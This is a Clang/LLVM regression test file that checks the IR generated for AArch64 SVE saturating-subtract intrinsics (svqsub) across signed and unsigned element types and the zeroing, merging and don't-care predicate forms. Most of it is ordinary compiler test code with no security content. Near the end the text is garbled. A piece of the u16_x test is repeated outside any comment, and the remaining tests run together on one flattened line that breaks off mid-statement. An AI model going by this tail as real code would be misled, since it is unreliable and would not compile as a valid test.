// CPP-CHECK-NEXT:    [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP1]], <vscale x 8 x i16> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 8 x i16> [[TMP2]]
//
svuint16_t test_svqsub_u16_z(svbool_t pg, svuint16_t op1, svuint16_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_u16_z'}}
  return SVE_ACLE_FUNC(svqsub,_u16,_z,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_u32_z(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer)
// CHECK-NEXT:    [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP1]], <vscale x 4 x i32> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 4 x i32> [[TMP2]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_u32_zu10__SVBool_tu12__SVUint32_tu12__SVUint32_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer)
// CPP-CHECK-NEXT:    [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP1]], <vscale x 4 x i32> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 4 x i32> [[TMP2]]
//
svuint32_t test_svqsub_u32_z(svbool_t pg, svuint32_t op1, svuint32_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_u32_z'}}
  return SVE_ACLE_FUNC(svqsub,_u32,_z,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_u64_z(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer)
// CHECK-NEXT:    [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[TMP1]], <vscale x 2 x i64> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 2 x i64> [[TMP2]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_u64_zu10__SVBool_tu12__SVUint64_tu12__SVUint64_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer)
// CPP-CHECK-NEXT:    [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[TMP1]], <vscale x 2 x i64> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 2 x i64> [[TMP2]]
//
svuint64_t test_svqsub_u64_z(svbool_t pg, svuint64_t op1, svuint64_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_u64_z'}}
  return SVE_ACLE_FUNC(svqsub,_u64,_z,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_s8_m(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 16 x i8> [[TMP0]]
//
// CPP-CHECK-LABEL: @_Z16test_svqsub_s8_mu10__SVBool_tu10__SVInt8_tu10__SVInt8_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 16 x i8> [[TMP0]]
//
svint8_t test_svqsub_s8_m(svbool_t pg, svint8_t op1, svint8_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_s8_m'}}
  return SVE_ACLE_FUNC(svqsub,_s8,_m,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_s16_m(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 8 x i16> [[TMP1]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_s16_mu10__SVBool_tu11__SVInt16_tu11__SVInt16_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 8 x i16> [[TMP1]]
//
svint16_t test_svqsub_s16_m(svbool_t pg, svint16_t op1, svint16_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_s16_m'}}
  return SVE_ACLE_FUNC(svqsub,_s16,_m,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_s32_m(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 4 x i32> [[TMP1]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_s32_mu10__SVBool_tu11__SVInt32_tu11__SVInt32_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 4 x i32> [[TMP1]]
//
svint32_t test_svqsub_s32_m(svbool_t pg, svint32_t op1, svint32_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_s32_m'}}
  return SVE_ACLE_FUNC(svqsub,_s32,_m,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_s64_m(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 2 x i64> [[TMP1]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_s64_mu10__SVBool_tu11__SVInt64_tu11__SVInt64_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 2 x i64> [[TMP1]]
//
svint64_t test_svqsub_s64_m(svbool_t pg, svint64_t op1, svint64_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_s64_m'}}
  return SVE_ACLE_FUNC(svqsub,_s64,_m,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_u8_m(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 16 x i8> [[TMP0]]
//
// CPP-CHECK-LABEL: @_Z16test_svqsub_u8_mu10__SVBool_tu11__SVUint8_tu11__SVUint8_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 16 x i8> [[TMP0]]
//
svuint8_t test_svqsub_u8_m(svbool_t pg, svuint8_t op1, svuint8_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_u8_m'}}
  return SVE_ACLE_FUNC(svqsub,_u8,_m,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_u16_m(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 8 x i16> [[TMP1]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_u16_mu10__SVBool_tu12__SVUint16_tu12__SVUint16_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 8 x i16> [[TMP1]]
//
svuint16_t test_svqsub_u16_m(svbool_t pg, svuint16_t op1, svuint16_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_u16_m'}}
  return SVE_ACLE_FUNC(svqsub,_u16,_m,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_u32_m(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 4 x i32> [[TMP1]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_u32_mu10__SVBool_tu12__SVUint32_tu12__SVUint32_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 4 x i32> [[TMP1]]
//
svuint32_t test_svqsub_u32_m(svbool_t pg, svuint32_t op1, svuint32_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_u32_m'}}
  return SVE_ACLE_FUNC(svqsub,_u32,_m,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_u64_m(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 2 x i64> [[TMP1]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_u64_mu10__SVBool_tu12__SVUint64_tu12__SVUint64_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 2 x i64> [[TMP1]]
//
svuint64_t test_svqsub_u64_m(svbool_t pg, svuint64_t op1, svuint64_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_u64_m'}}
  return SVE_ACLE_FUNC(svqsub,_u64,_m,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_s8_x(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 16 x i8> [[TMP0]]
//
// CPP-CHECK-LABEL: @_Z16test_svqsub_s8_xu10__SVBool_tu10__SVInt8_tu10__SVInt8_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 16 x i8> [[TMP0]]
//
svint8_t test_svqsub_s8_x(svbool_t pg, svint8_t op1, svint8_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_s8_x'}}
  return SVE_ACLE_FUNC(svqsub,_s8,_x,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_s16_x(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 8 x i16> [[TMP1]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_s16_xu10__SVBool_tu11__SVInt16_tu11__SVInt16_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 8 x i16> [[TMP1]]
//
svint16_t test_svqsub_s16_x(svbool_t pg, svint16_t op1, svint16_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_s16_x'}}
  return SVE_ACLE_FUNC(svqsub,_s16,_x,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_s32_x(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 4 x i32> [[TMP1]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_s32_xu10__SVBool_tu11__SVInt32_tu11__SVInt32_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 4 x i32> [[TMP1]]
//
svint32_t test_svqsub_s32_x(svbool_t pg, svint32_t op1, svint32_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_s32_x'}}
  return SVE_ACLE_FUNC(svqsub,_s32,_x,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_s64_x(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 2 x i64> [[TMP1]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_s64_xu10__SVBool_tu11__SVInt64_tu11__SVInt64_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 2 x i64> [[TMP1]]
//
svint64_t test_svqsub_s64_x(svbool_t pg, svint64_t op1, svint64_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_s64_x'}}
  return SVE_ACLE_FUNC(svqsub,_s64,_x,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_u8_x(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 16 x i8> [[TMP0]]
//
// CPP-CHECK-LABEL: @_Z16test_svqsub_u8_xu10__SVBool_tu11__SVUint8_tu11__SVUint8_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 16 x i8> [[TMP0]]
//
svuint8_t test_svqsub_u8_x(svbool_t pg, svuint8_t op1, svuint8_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_u8_x'}}
  return SVE_ACLE_FUNC(svqsub,_u8,_x,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_u16_x(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 8 x i16> [[TMP1]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_u16_xu10__SVBool_tu12__SVUint16_tu12__SVUint16_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 8 x i16> [[TMP1]]
//
svuint16_t test_svqsub_u16_x(svbool_t pg, svuint16_t op1, svuint16_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_u16_x'}}
  return SVE_ACLE_FUNC(svqsub,_u16,_x,)(pg, op1, op2);
}
function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_u16_x'}} return SVE_ACLE_FUNC(svqsub,_u16,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_u32_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP1]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_u32_xu10__SVBool_tu12__SVUint32_tu12__SVUint32_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP1]] // svuint32_t test_svqsub_u32_x(svbool_t pg, svuint32_t op1, svuint32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_u32_x'}} return SVE_ACLE_FUNC(svqsub,_u32,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_u64_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP1]] // // CPP-CHECK-LABEL: @_Z17test_svqsub_u64_xu10__SVBool_tu12__SVUint64_tu12__SVUint64_t( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[OP2:%.*]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP1]] // svuint64_t test_svqsub_u64_x(svbool_t pg, svuint64_t op1, svuint64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_u64_x'}} return SVE_ACLE_FUNC(svqsub,_u64,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s8_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer) // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 16 